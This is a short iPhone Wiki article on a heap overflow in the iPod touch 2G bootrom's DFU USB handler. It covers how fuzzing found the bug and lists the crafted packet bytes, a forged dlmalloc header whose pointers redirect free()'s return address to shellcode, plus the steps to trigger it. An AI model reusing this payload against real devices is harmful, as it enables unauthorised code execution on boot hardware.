The iPhone Wiki is no longer updated. Visit this article on The Apple Wiki for current information. |
usb_control_msg(0xA1, 1) Exploit
A heap overflow exists in iPod touch 2G bootrom (old and new MC models) DFU mode when sending a USB control message of request type 0xA1, request 0x1.
On newer devices, the same USB message triggers a double free() when the image upload is marked as finished, also rebooting the device (but that's not exploitable because the double free() happens in a row). posixninja analyzed and explained this one.
Credit (Alphabetical)
Vulnerability
By fuzzing all possibles USB control messages of iPod2,1 DFU mode, it appeared that one special usb control message made it reboot. The reboot happens only with lengths bigger than 0x100 bytes. It's a buffer overflow.
In order to exploit it, send this special USB packet (using 0x21, 1) :
[ 0x100 bytes of nulls ] /* free'd buffer dlmalloc header: */ 0x84, 0x00, 0x00, 0x00, // 0x00: previous_chunk 0x05, 0x00, 0x00, 0x00, // 0x04: next_chunk /* free'd buffer contents: (malloc'd size=0x1C, real size=0x20, see sub_9C8) */ 0x80, 0x00, 0x00, 0x00, // 0x08: (0x00) direction 0x80, 0x62, 0x02, 0x22, // 0x0c: (0x04) usb_response_buffer 0xff, 0xff, 0xff, 0xff, // 0x10: (0x08) 0x00, 0x00, 0x00, 0x00, // 0x14: (0x0c) data size (_replace with packet size_) 0x00, 0x01, 0x00, 0x00, // 0x18: (0x10) 0x00, 0x00, 0x00, 0x00, // 0x1c: (0x14) 0x00, 0x00, 0x00, 0x00, // 0x20: (0x18) 0x00, 0x00, 0x00, 0x00, // 0x24: (0x1c) /* attack dlmalloc header: */ 0x15, 0x00, 0x00, 0x00, // 0x28: previous_chunk 0x02, 0x00, 0x00, 0x00, // 0x2c: next_chunk : 0x2 choosed randomly :-) 0x01, 0x38, 0x02, 0x22, // 0x30: FD : shellcode_thumb_start() 0x90, 0xd7, 0x02, 0x22, // 0x34: BK : free() LR in stack
Then trigger the exploit by using USB control message 0xA1, 1 with the same data size.
free() LR in stack will be replaced by FD, a pointer to the shellcode to execute() !